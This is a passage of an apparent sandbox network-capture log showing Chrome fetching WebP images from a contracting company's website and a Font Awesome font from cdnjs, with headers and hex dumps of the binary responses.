                                              Data Ascii: 2000H7GTITe9qO5cnzz9h6Bx9+wrY2ukiyo+1/UhYFACJSqQ7AP4EBnq9zAvBy6MYWbI2dxOfL6cDbjspyPfzfgI7/zSQFACJSqT8AG3q+xu3AX0I3tKArfof+XwYucVRWHe4zE75GHFMw4pgCABGpxHbASZ6vMQZLghOLk4GlPJU9q9DWBkflrQrM77iOOv0voxQAiEi5BgM3Yk+ZvkzDjvYNebpfqaWA33os/3zgLYflafuflE0BgIiU6yr
                                              2024-09-27 06:20:13 UTC6INData Raw: 32 57 50 51 30 37
                                              Data Ascii: 2WPQ07
                                              2024-09-27 06:20:13 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:20:13 UTC8192INData Raw: 32 30 30 30 0d 0a 39 45 52 67 47 41 69 42 2b 78 72 67 4d 34 6c 62 62 33 74 72 73 65 2f 70 2b 46 4c 58 78 4c 67 77 75 42 68 54 79 56 66 54 59 77 4a 33 51 44 52 55 6f 70 41 42 44 78 49 37 5a 31 41 50 38 46 64 67 62 4f 61 2b 66 37 58 43 38 41 66 42 4f 59 45 62 72 78 5a 64 67 49 4f 4e 68 54 32 57 38 44 64 34 52 75 6f 45 68 7a 48 55 4e 58 51 43 53 6a 51 6f 38 41 66 41 65 38 6a 77 30 39 33 77 48 38 75 38 79 66 63 7a 30 43 6b 49 62 68 2f 36 37 41 31 66 67 37 75 76 6c 73 6f 43 46 30 49 30 57 61 55 77 41 67 34 73 64 59 4c 4e 76 62 67 67 37 4c 2f 41 46 59 47 50 6a 52 55 35 31 37 41 38 73 36 4c 6a 4d 4e 41 63 41 35 77 42 42 50 5a 62 2b 42 44 76 32 52 53 47 6b 4b 51 4d 53 66 70 78 32 58 31 77 76 34 70 63 66 36 72 6f 6e 37 70 2b 44 59 74 77 44 75 43 42 7a 76 73 66 77
                                              Data Ascii: 20009ERgGAiB+xrgM4lbb3trse/p+FLXxLgwuBhTyVfTYwJ3QDRUopABDxI7Z1AP8FdgbOa+f7XC8AfBOYEbrxZdgIONhT2W8Dd4RuoEhzHUNXQCSjQo8AfAe8jw093wH8u8yfcz0CkIbh/67A1fg7uvlsoCF0I0WaUwAg4sdYLNvbgg7L/AFYGPjRU517A8s6LjMNAcA5wBBPZb+BDv2RSGkKQMSfpx2X1wv4pcf6ron7p+DYtwDuCBzvsfw
                                              2024-09-27 06:20:13 UTC6INData Raw: 48 4a 6d 37 43 76
                                              Data Ascii: HJm7Cv
                                              2024-09-27 06:20:13 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:20:13 UTC8192INData Raw: 32 30 30 30 0d 0a 59 6b 74 6a 64 2b 35 34 71 7a 61 44 49 57 42 4a 78 50 5a 56 73 4a 4f 77 49 6a 69 58 2f 36 71 6a 58 50 59 35 6b 34 4b 33 6b 50 39 4d 4b 47 2b 59 38 6b 6a 6b 51 30 61 54 49 4a 57 34 74 79 44 65 6c 5a 4c 2b 44 54 30 56 67 41 57 6d 34 57 7a 50 48 59 56 4e 56 39 6f 53 75 65 6c 4c 77 46 41 47 41 66 4b 69 64 68 54 78 62 6c 37 67 32 65 67 63 33 48 66 34 37 74 70 53 36 2b 50 69 2f 35 6d 6f 62 6b 48 70 58 71 67 33 58 34 42 32 46 44 59 6c 4b 62 38 63 41 78 32 48 61 2f 63 69 32 4d 4a 58 56 4b 32 31 50 77 4e 39 68 68 4b 6c 39 55 38 44 4f 37 59 57 6d 71 38 35 43 33 77 37 66 2f 59 4b 4d 43 74 32 4b 5a 43 76 4e 71 55 2b 41 4d 59 41 4e 61 44 77 51 61 73 50 55 70 70 2b 49 76 31 30 65 55 38 68 67 41 46 41 33 43 39 72 49 75 56 50 4a 71 59 4f 36 4f 76 66 6a
                                              Data Ascii: 2000Yktjd+54qzaDIWBJxPZVsJOwIjiX/6qjXPY5k4K3kP9MKG+Y8kjkQ0aTIJW4tyDelZL+DT0VgAWm4WzPHYVNV9oSuelLwFAGAfKidhTxbl7g2egc3Hf47tpS6+Pi/5mobkHpXqg3X4B2FDYlKb8cAx2Ha/ci2MJXVK21PwN9hhKl9U8DO7YWmq85C3w7f/YKMCt2KZCvNqU+AMYANaDwQasPUpp+Iv10eU8hgAFA3C9rIuVPJqYO6Ovfj


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              73192.168.2.465408173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:13 UTC723OUTGET /uploads/projects/1/c10a34a38c54c09dea6d4e76cb363989.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:13 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:13 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Wed, 11 Jan 2023 06:28:03 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 417402
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:13 UTC7930INData Raw: 52 49 46 46 72 5e 06 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 c0 0c 00 96 09 00 56 50 38 20 fe 5d 06 00 30 d8 22 9d 01 2a c1 0c 97 09 3e e9 6c af 52 a9 25 bd bb a5 53 fa 6b b0 1d 09 65 6e 2d 7e e4 9e d3 ca 8b e4 f1 d0 79 6d 6e f1 8c 6f f7 fb 05 23 8f 10 07 30 10 c9 39 af 28 fd 4f ea b8 8c a8 3f 03 fe df ef 1c fa 38 ff 1f 2d 43 e3 1f fa 9e 45 fe cf ea 09 e1 cf e3 2b bb 1e c1 7e 63 19 c9 7d 8f d4 5b ff 8f a8 0f eb 1f f7 3a 97 7f e7 e8 5f f9 df 38 7c e3 2d 65 ec 17 ad 7f 9e 8a 7c c3 eb df fa bf 5b fb ff ff af ce 57 fc fc 98 f8 8f fd be 84 1e d9 f7 ff fe 87 b6 ef fd 3e bb bf ca 7e 77 fc 14 ff b8 ff e9 eb 23 ff 97 af ff f0 df fc fd 51 fe f5 7a bf 7f ef fd e8 f7 d7 fe 37 d4 57 fb 9f a6 5f ef ff bc bf f7 1f fe 7f ff ff f8 fc 2f ff 3a ff a1 ff ff da b3
                                              Data Ascii: RIFFr^WEBPVP8XVP8 ]0"*>lR%Sken-~ymno#09(O?8-CE+~c}[:_8|-e|[W>~w#Qz7W_/:
                                              2024-09-27 06:20:13 UTC8000INData Raw: a6 53 2d ab 81 ca 3c 73 b9 ce 6e 63 03 f0 83 d9 89 56 a2 36 c0 d9 0b ee 9c 10 71 d0 e1 c9 ad de 6d be c9 8f 96 c3 c9 19 15 83 d1 9f 5d 5e ca 44 f0 46 fc 90 61 19 b9 9a 03 56 0c d9 2f 4c 9f e1 bc 5c eb e5 73 5a 3a 13 86 d5 0b 03 9c a9 97 25 e3 27 af e5 b0 b8 c9 bc 6f 99 30 b8 c9 85 c6 4c 2e 32 61 71 93 0d 8d b0 12 ed 80 97 6c 04 bb 68 54 c0 eb 26 07 4d 0c f4 6e 13 b3 b9 2f 07 12 37 d8 56 9a ff 64 61 ba c0 30 91 b8 41 76 ce 92 5c c4 10 b5 ce 9c 46 59 eb 66 6f 8b 48 49 24 4d da fb c0 50 6f dd 08 f5 f8 36 ee 72 5f 5a 9a 4a 64 70 39 59 32 cd b5 56 57 6a 56 db 4e e9 e9 75 b7 89 80 0b 7c fc f6 f3 90 c4 27 03 9f 4e a6 9d 05 99 59 e5 b5 16 eb 9d d2 a9 dc 9c 80 ad 5d ad 68 8a a9 f6 af d3 cb 56 86 0c 85 f2 df 86 ae ed ac 3b 78 56 2e 7f a5 9c cf 4f 74 1b 42 c1 94 c4
                                              Data Ascii: S-<sncV6qm]^DFaV/L\sZ:%'o0L.2aqlhT&Mn/7Vda0Av\FYfoHI$MPo6r_ZJdp9Y2VWjVNu|'NY]hV;xV.OtB
                                              2024-09-27 06:20:13 UTC8000INData Raw: 97 f0 ed 87 e8 b8 c9 85 c5 f6 76 da c5 c3 d6 c2 e0 3a 5c be b2 04 0b 2b c1 c1 04 42 df 42 18 b3 48 2b fb 65 b9 e9 98 d2 c1 0e f0 88 40 99 10 77 f6 01 9b 9a 49 dc 33 1d 21 ea 13 56 73 bd 43 d2 0c 5f 40 76 b8 15 fa 7d 33 5a 44 7e 46 61 00 f0 bf 60 68 fc c8 03 49 55 19 7e f3 84 01 81 24 f2 68 1f 33 61 c1 9e e0 31 6e 85 6e b1 84 66 7b 80 24 fc d9 92 92 b2 9b 9e 9d 35 95 44 fd 7b c3 d0 42 56 f8 e6 2f db 5e da 04 fe 3e 95 bc 01 0e ed 3e 25 e2 f1 bf e6 79 bb 2d 70 88 ff 4c 79 43 75 ab c5 be 50 ee bf 60 2b fe ad f9 da 16 23 24 f4 cc 13 d5 f2 87 5a 0e 18 03 f6 a2 5c 9f 7d 56 3a 62 28 e4 23 6c a1 bf 9c c5 99 f7 af eb 04 30 9f 88 e5 00 c8 c1 e5 e6 06 7e 98 0d b6 f2 b2 53 09 e0 65 2f 5d ea 3e d5 a0 e3 ed e1 0c 92 be 9b 5a 40 94 b5 99 a3 e7 f7 3a 94 c9 94 61 27 96 5f
                                              Data Ascii: v:\+BBH+e@wI3!VsC_@v}3ZD~Fa`hIU~$h3a1nnf{$5D{BV/^>>%y-pLyCuP`+#$Z\}V:b(#l0~Se/]>Z@:a'_
                                              2024-09-27 06:20:13 UTC8000INData Raw: 76 2b ac 2a 58 b1 26 07 59 2a d8 2f 68 42 c8 ae b5 63 7c f8 ff cb 69 a6 b1 c3 b3 d6 bf 05 3c da 3e 89 69 78 2c 30 58 8e b3 c8 67 bf fd c9 fd 3f e9 d4 c3 2d 28 33 96 80 b1 ef 78 9d 1f 51 df ff 7f 1b fe ab 56 67 24 9e b0 ff bb bf d3 fa 74 be 52 7c 85 55 10 7e b0 6d 5d b3 54 63 f0 a9 d1 ba b6 9c fc e2 1c c9 21 c7 43 ab 74 c9 16 85 4c 32 1d 79 74 94 df 99 49 9e 61 54 5e a6 b2 ea 38 5f fc 4a dd 17 6c ff f6 67 1e e6 f7 aa 0d 6a 51 d3 06 7e 0e 35 d5 27 f9 54 20 2c 6e 64 ac 5f 4f b1 bf 11 97 d3 c1 a9 36 7d c7 82 8a 4a da 16 f7 1b 5d 49 f6 c3 0c ba e8 f2 41 72 ce ac 05 5d fa f9 07 e0 30 93 a7 9b 0f af b3 5b 2c 3e 00 f3 95 e4 a6 41 fa 5a 24 8c 84 21 13 cd 19 69 a6 26 50 d4 04 da 97 d8 a6 67 28 71 d5 31 bb 3a 32 fe 39 c1 b2 01 87 31 1c e1 34 08 f7 83 74 5c 7c 2a b1
                                              Data Ascii: v+*X&Y*/hBc|i<>ix,0Xg?-(3xQVg$tR|U~m]Tc!CtL2ytIaT^8_JlgjQ~5'T ,nd_O6}J]IAr]0[,>AZ$!i&Pg(q1:2914t\|*
                                              2024-09-27 06:20:13 UTC8000INData Raw: be 35 37 ed cd 68 a9 61 72 f3 6b b6 4a ff 38 3f ac 6e 28 57 30 91 0e 4b 18 e9 b9 9d ec f8 5b f9 40 6e 23 41 64 6f e7 95 83 2d ca 50 cd 1d 18 b4 7c ba 1d c4 ed 1d d4 85 82 4c 36 88 c5 47 13 07 cd 91 ff 6d 43 c5 8e be 79 44 d4 1b f1 58 f6 c5 90 0f 2f 1c 6b c9 be 07 6a d6 44 04 8c 3f 05 e2 66 ac 6d db f1 b2 b8 73 ef dc 02 1f 45 1b 31 26 05 ac 38 9d af f5 98 18 26 2b ae ee 85 b5 36 b3 36 1c 49 50 9f 21 85 4b 35 f1 6c 5b 48 1c 41 78 03 5c 09 31 d5 59 d1 aa 6b 2a 07 41 ec d9 04 a4 46 57 1a 7e 5b 08 e6 2b 84 a2 ad 9b 44 1a 46 00 f3 f9 67 f8 82 5f c7 f8 91 39 c5 34 aa 51 77 fa ff 3c 86 3d ed 82 7b 38 b4 4c bf f5 49 49 c3 aa 26 44 e2 2b e1 ea fe 5b 0b 92 cf d3 6f c7 59 bd 07 b7 d6 91 c3 cc b6 e1 bd 4f cb 1c b7 8d f4 ce 46 4d c8 da 04 9d 56 22 3a 86 52 02 b6 39 fd
                                              Data Ascii: 57harkJ8?n(W0K[@n#Ado-P|L6GmCyDX/kjD?fmsE1&8&+66IP!K5l[HAx\1Yk*AFW~[+DFg_94Qw<={8LII&D+[oYOFMV":R9
                                              2024-09-27 06:20:13 UTC8000INData Raw: ef 7c b2 0b 79 66 3c 74 78 96 36 c8 6a 8e b3 b4 39 73 31 67 04 46 92 c9 a8 f5 b0 4e ad 62 74 2c 41 81 20 27 e9 91 74 0a 47 c5 6b dd 0b 12 ce 2e e7 13 16 16 cb a2 96 6e 9a 6c 24 49 7a b9 c2 c0 01 5f fe e9 6b 8f ff 49 49 5f 3e 21 c0 5a 89 19 a4 ac b8 ea fa 56 ea 77 d1 e3 da 74 dd 6a 57 06 bf 3b 78 22 38 9a 41 cd 4b 6e fb 49 92 6d 84 90 70 8f 6f 95 2c e1 9c 94 c5 3f d2 ec 2d f6 5d 2a b7 fa 44 ce 4f 89 3c ca ab db 98 b0 9a e5 1e c9 be 2b 65 bb 5e bd b8 52 a3 77 73 8c 19 39 9c 55 96 79 96 f7 d2 fc a4 00 31 b1 29 c6 e9 61 62 2e cb f6 b1 c9 88 a3 4b ce 42 fa 79 30 91 d4 d3 df 6c cd a4 1b d8 8d 00 aa af c3 64 f7 b4 51 92 e8 61 88 7f f6 32 1b ec e3 33 f6 68 71 bb d5 0d 74 6b 4f c5 ae a3 2e 98 65 06 ff 5c 0a 6b d9 a9 a9 38 a7 e3 9b e9 0a 11 6b 9f b4 0d ff be 28 4a
                                              Data Ascii: |yf<tx6j9s1gFNbt,A 'tGk.nl$Iz_kII_>!ZVwtjW;x"8AKnImpo,?-]*DO<+e^Rws9Uy1)ab.KBy0ldQa23hqtkO.e\k8k(J
                                              2024-09-27 06:20:13 UTC8000INData Raw: d9 79 a9 dc d7 ef 36 ee 3a 76 d2 03 80 21 78 df 87 40 91 7e 61 47 a3 82 5c ef 06 c4 88 b3 5c 73 16 24 12 5f 61 47 5f 8e 0d d7 05 f9 65 6b 64 ed 8c 2c 02 d6 fe 9a 97 4b 17 33 54 d9 4d 6c 67 1e ba 51 96 f2 35 1e 04 ff 7c 60 88 94 8b cd f3 9e 95 c9 e9 95 88 b1 c5 66 af 76 f8 36 65 3b 11 67 d8 10 b0 ed 4d b6 65 64 b3 fc 9e cb 08 6a f3 6f 92 40 ee f6 ad 4a 5e 49 ff 7d 1f 9b eb 33 b6 a8 e5 69 e1 8a d1 e0 aa 71 3b 0a 44 52 f8 5d 03 40 8f 09 ba 29 0c 7d ca f1 56 56 cc 29 e0 1a 8a 7f 7d f0 ea af d8 ea 5d fe 06 ad 61 08 f1 6b c3 ae 26 89 cf 79 70 1d 1c 9b 77 61 2e 37 1a 75 a3 1c 94 94 db e0 fb c4 ff 48 07 c1 58 d4 03 9d 09 08 6f c4 6f 0d c6 81 6d 95 b6 b4 12 92 3a bd 23 38 54 98 e6 56 30 68 30 36 d9 12 27 f2 24 8e 15 a3 42 77 34 14 8a f4 03 46 67 86 b5 22 e7 c3 98
                                              Data Ascii: y6:v!x@~aG\\s$_aG_ekd,K3TMlgQ5|`fv6e;gMedjo@J^I}3iq;DR]@)}VV)}]ak&ypwa.7uHXoom:#8TV0h06'$Bw4Fg"
                                              2024-09-27 06:20:13 UTC8000INData Raw: 2f ae 3e 42 22 a8 7a 73 43 2f 15 58 c8 00 2a fe 6a ef b4 46 5f 6f e7 0b 03 87 21 65 bb 40 ce 2b 24 e8 2e a4 55 aa 91 7d c0 17 34 50 be 1c 2a 1e 5a f9 5b 9e 09 65 c3 79 fa b2 01 d9 c6 3d fb a5 38 69 c0 ee 42 37 53 e8 40 29 7a b7 9e 6f cf 4d e9 c0 ce a0 5a 30 b5 9f 3d c4 1b 92 32 d7 23 43 f9 bc cd 07 c4 bb 48 68 47 77 3b 9a b6 c0 1b f5 8f 5b 89 45 6e 99 0e 79 2a 9d 0b 9b 99 1c ed fb 1b 7f 3c 45 66 68 de 82 13 40 ee a3 31 d2 ae fc a4 3a 17 91 f8 5a 82 2c 4c 7e 02 c0 bc 2e 81 a2 60 8d 27 e2 f0 da 13 c5 b6 d9 c1 77 ce b0 1c 52 46 76 c6 92 d3 1d a4 21 2a 3c dd 5a c6 a4 bc a9 92 49 12 7a d5 15 c7 d0 36 7c e3 c2 e0 f0 e6 c6 04 19 7c 10 d3 57 38 2c 8a 25 52 ea 29 13 ad d9 3d ed 5a 43 49 51 72 0d b0 b0 02 35 d1 bd f9 b5 e9 d3 86 c6 6f f9 5d b8 80 58 57 8f 34 64 3f
                                              Data Ascii: />B"zsC/X*jF_o!e@+$.U}4P*Z[ey=8iB7S@)zoMZ0=2#CHhGw;[Eny*<Efh@1:Z,L~.`'wRFv!*<ZIz6||W8,%R)=ZCIQr5o]XW4d?
                                              2024-09-27 06:20:13 UTC8000INData Raw: 68 9f 30 46 54 a6 35 83 e4 5e 16 58 da 27 34 78 85 cb ad 91 d0 bb 2d 67 27 c6 d9 e2 25 97 47 c0 b0 12 15 46 8a 1c 1c 0c 5c 65 e6 2c d4 50 b0 ac a8 8b 67 78 f1 9f cc 87 b7 5d 37 f5 c2 b6 99 a2 42 53 78 3b aa f9 e0 6b 83 9a 47 7f 28 46 6e 76 32 8a 72 78 34 88 0a dd 5f 9c 6b 17 ed 5e a1 ab 56 f9 22 d9 18 86 df 00 51 1a d6 f1 70 23 61 69 2f 9b ba b6 0c 5a 7f fc fd 84 d3 a7 ca 1d a2 09 7e 7a 23 73 20 e2 34 56 87 33 59 b4 bf 41 ee 84 2c 95 ad b1 47 19 00 77 0a f3 a1 a2 b2 34 0c 18 82 12 a7 44 47 a1 84 9e bc 83 a0 e1 6d 32 cc 15 da 57 9c 03 17 a1 fa 84 6d a8 6b fd b5 ac f6 7a 28 1b 87 c0 6f 98 54 10 62 57 d1 a8 c3 da c4 38 16 d0 4c 96 4f d7 e6 8e 84 c9 9f 87 b7 52 3a 1b d4 bd 0e 48 12 99 f4 ce ba ba 9d 82 55 8f dc a4 44 f1 79 14 94 0c 31 f7 db df dd 91 35 94 01
                                              Data Ascii: h0FT5^X'4x-g'%GF\e,Pgx]7BSx;kG(Fnv2rx4_k^V"Qp#ai/Z~z#s 4V3YA,Gw4DGm2Wmkz(oTbW8LOR:HUDy15
                                              2024-09-27 06:20:13 UTC8000INData Raw: 55 b8 56 f7 a1 30 9c a9 2c 40 7a c2 82 60 cf 08 0f 84 2e 08 7c 8d 3d 76 4e bc f1 5b ea 2c 06 12 9a 21 da b9 32 44 0c 27 0d 89 0e fe 61 e6 b2 fe cc a9 3b f1 7e 3b 90 a9 4c 98 a4 f3 de 60 11 1a 6b b0 b0 db 3f 7f 66 02 0a 5e d1 33 dc 99 a9 0a 99 c4 be 3f 97 09 5b ea 41 16 ff b6 57 53 60 b2 b8 d8 1d 80 d7 a6 6c 3a 67 0e ea 14 bb eb f0 a5 ba 70 40 89 75 d0 67 da e4 70 e4 f1 06 23 83 f3 ef 95 e7 24 34 3c 49 6a 0a e9 fc 88 3a 0e cd d1 65 b6 68 8f ae 7d 8f 80 a9 93 92 66 21 5b 62 d7 00 6e a7 01 07 9c 9d b7 0e d8 48 77 98 4c ec f6 98 28 ce 51 7a ac ef 79 a9 31 ae e8 c1 72 75 20 79 c0 da 4d 91 ae 8b 13 45 44 83 b0 27 b8 ce db 9e 1c d3 d2 93 f6 45 7b 2e 0b 68 d6 44 d0 c2 d5 93 8b 51 6f 29 28 a4 9f 59 32 62 e2 f2 f1 e5 a0 3a 86 be b7 ff 47 f4 b5 65 be 26 e9 61 97 46
                                              Data Ascii: UV0,@z`.|=vN[,!2D'a;~;L`k?f^3?[AWS`l:gp@ugp#$4<Ij:eh}f![bnHwL(Qzy1ru yMED'E{.hDQo)(Y2b:Ge&aF


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              74192.168.2.465415104.17.25.144436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:14 UTC673OUTGET /ajax/libs/font-awesome/6.2.1/webfonts/fa-v4compatibility.woff2 HTTP/1.1
                                              Host: cdnjs.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://www.citydiamondcontracting.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: font
                                              Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.css
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:20:14 UTC947INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:14 GMT
                                              Content-Type: application/octet-stream; charset=utf-8
                                              Content-Length: 4568
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Cache-Control: public, max-age=30672000
                                              ETag: "6373d4a6-11d8"
                                              Last-Modified: Tue, 15 Nov 2022 18:04:22 GMT
                                              cf-cdnjs-via: cfworker/kv
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Timing-Allow-Origin: *
                                              X-Content-Type-Options: nosniff
                                              CF-Cache-Status: HIT
                                              Age: 42469
                                              Expires: Wed, 17 Sep 2025 06:20:14 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xmlcn0RYC%2Blz88vOClBYCPfG%2B%2F6K41SiYs7pCtrwq10RrnvpYh2AxOwd9qYV2RfajMEw%2FH0QlwGzMJGJJxHla8ay8HIuG%2BOTwtTvt4uvaqZINyuDpkg3t7EbT7uGeneVTxGwPApZ"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=15780000
                                              Server: cloudflare
                                              CF-RAY: 8c9962fd1d244307-EWR
                                              2024-09-27 06:20:14 UTC422INData Raw: 77 4f 46 32 00 01 00 00 00 00 11 d8 00 0a 00 00 00 00 24 64 00 00 11 90 03 02 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 81 1c 00 82 1c ca b9 60 cb 50 05 89 00 07 20 85 31 12 11 55 b5 1f 02 a0 91 b2 70 fe 7e 3f bd d3 ec bd b1 35 a3 91 a5 19 c9 b2 34 c9 7a 77 2d 4b 1b 8d b3 14 70 2c 05 ba 8d 8a c9 96 d1 05 62 f7 a0 80 39 e2 1c 10 eb e0 b7 f0 75 f0 75 39 62 a7 fc 65 5b 94 d3 aa 96 65 8d 46 1a 49 56 40 da e5 89 1d c7 59 b2 59 ca 3a 0b 00 47 10 f2 25 5e b0 7c b1 8e e9 87 e4 e7 01 d2 8b e8 07 f8 c4 f7 e6 ff 5f fb d6 17 b1 46 88 70 06 2f c1 4b e7 d0 09 e9 de 37 2b ef 4b 98 41 67 dd 47 d0 d1 d5 f9 98 6a fa 82 d9 aa 46 0e 69 2b ae 71 0f 55 9b 96 b0 a5 66 64 91 cd 1a 4c 4e bc 46 88 b5 91 7b 29 0f 20 40 85 54 e0 e5
                                              Data Ascii: wOF2$d8$ ``P 1Up~?54zw-Kp,b9uu9be[eFIV@YY:G%^|_Fp/K7+KAgGjFi+qUfdLNF{) @T
                                              2024-09-27 06:20:14 UTC1369INData Raw: ae 6b 40 15 4d 00 38 12 22 a8 c2 ee e1 51 c3 b5 e1 d5 c3 87 87 83 e1 d3 c3 e7 86 1b c3 0f 0f bf 32 fc da f0 5b c3 97 87 bf 19 fe 65 f8 9f ed da 76 b2 7d e4 f6 e1 ed 93 b6 cf d9 be 64 fb b2 ed 2b b6 ef dd 7e df f6 5b af 4c be 72 ff 78 0c 30 3c 6a b8 36 bc 6a f8 10 8c 4e 56 97 f5 d1 fa db 57 6c df f5 4d cb 52 fe 58 7e 5c 3e 21 1f 97 0f c9 07 e4 fd f2 36 d9 97 97 ca 8b e4 aa 5c 96 07 64 2a b9 78 45 fc 4e bc 24 5e 10 bf 16 3f 15 3f 11 3f 16 5f 12 cf 89 fd c2 76 be 22 e7 42 ff d6 26 0c 80 71 89 03 2c a1 01 13 b0 13 22 d8 03 80 ed 98 d1 c0 6b a8 b0 db 9e cf b3 9e b7 a0 d3 84 79 3a 67 ba 2b 89 d7 22 49 8e fd 51 29 38 e7 5c 60 51 2e 53 74 c1 05 83 0b be 73 41 7a c1 05 e9 05 df b9 00 4b ce c5 a8 bb 64 58 0a ce ef 1f bd f6 d8 63 27 3d f6 d8 f2 63 68 3f b6 fc d8 63
                                              Data Ascii: k@M8"Q2[ev}d+~[Lrx0<j6jNVWlMRX~\>!6\d*xEN$^???_v"B&q,"ky:g+"IQ)8\`Q.StsAzKdXc'=ch?c
                                              2024-09-27 06:20:14 UTC1369INData Raw: be b4 1c 83 c6 7a 3c 00 54 5d c0 12 e0 00 aa b0 03 5a d0 03 c0 a4 d7 0d a6 28 2e 16 cc 82 47 24 d5 a9 6e 63 d0 ee b5 bb af 54 0e 06 a3 5b 1b c2 41 74 44 03 37 6b a7 65 d4 c7 8d 31 20 bc 69 a3 28 ea a3 23 1a c5 13 54 76 31 da 8a a2 a2 0b 6d 83 df f1 16 96 b8 09 05 80 9f e0 b2 b1 55 54 cc 4a 72 8a 99 28 c4 30 51 a2 ce 77 62 3a e5 3a cf 74 aa bf 60 b0 d7 ef 9c 7a 6a e7 7d fd ce a9 a7 76 6c 63 7e 46 2c 3d dc 3c c4 6a 63 fd 4b 8e 44 fa 5f 83 83 d0 85 93 e0 2a 00 9f d1 a0 d1 22 61 77 7e 95 64 bd 85 19 62 6f d3 2a 34 98 6b b8 54 ce dc 8b 7a 48 49 cc 38 32 9d 2b e3 98 45 12 ec b8 97 7f a7 86 91 0a 62 18 44 d4 02 fc 54 88 44 34 7c 89 0f dd 4a 3b 7a 3b 7e ff ba 89 eb 26 46 89 69 2e 06 15 d3 ac 04 4b 8c 2d 6d ab 5e c4 7e 8f c7 f7 81 6e af a9 61 a4 a3 4d e9 fb 32 11
                                              Data Ascii: z<T]Z(.G$ncT[AtD7ke1 i(#Tv1mUTJr(0Qwb::t`zj}vlc~F,=<jcKD_*"aw~dbo*4kTzHI82+EbDTD4|J;z;~&Fi.K-m^~naM2
                                              2024-09-27 06:20:14 UTC1369INData Raw: db e6 9c 7a 7b 53 3b 99 c5 56 6b f8 2e b9 57 4b 21 04 4b aa aa b0 6d a1 aa 49 26 84 90 57 bb 74 eb f0 b0 3f 98 c6 e6 7e 52 36 f0 ea 68 a8 61 07 ce 44 eb c9 a0 0d ac 31 9a 27 fd cd 73 70 2f ef 9c 8f 9a 47 52 1c 76 6c d8 ae 45 06 a1 80 9c 73 bc ac 5a a8 60 73 e1 ea 06 0b be 8d fd 00 bb 70 0e 66 e3 fc 74 ae c4 88 09 a3 34 ad e6 55 ad bd 40 bc 43 b4 0b 99 83 05 d3 b8 d9 33 18 94 6f d6 91 79 d9 49 17 76 e0 f4 57 92 aa 55 0c 31 cd 21 d7 c5 73 b8 ad 98 e4 d3 84 7d 7e c9 1b a5 fe 44 c2 84 51 25 e7 83 89 13 45 9a 69 fd a1 b6 f8 80 b2 c6 6b 8e a2 d9 b4 c4 f5 14 d4 72 d7 bb dd e7 7b 7e 57 db e4 86 fd 2e e7 76 ca 51 e3 8b 45 d2 ce 96 e2 dc 2e da 9c 9f c3 18 ad 1f 51 72 97 31 5d 51 4c d3 12 bc d4 4f f3 e7 67 b3 f3 e7 93 eb 2e 94 93 55 6d 09 73 cc e8 da 9c bb 56 c8 36
                                              Data Ascii: z{S;Vk.WK!KmI&Wt?~R6haD1'sp/GRvlEsZ`spft4U@C3oyIvWU1!s}~DQ%Eikr{~W.vQE.Qr1]QLOg.UmsV6
                                              2024-09-27 06:20:14 UTC39INData Raw: 34 31 29 69 88 10 45 e4 51 44 09 25 84 28 61 04 21 6a 12 cf 37 16 26 48 cb d7 21 cf e2 58 96 77 ca ff 37 03 03 00 00
                                              Data Ascii: 41)iEQD%(a!j7&H!Xw7


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              75192.168.2.465411173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:14 UTC723OUTGET /uploads/projects/5/37ea8047a2494b50f7dc694b8f8dcf37.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
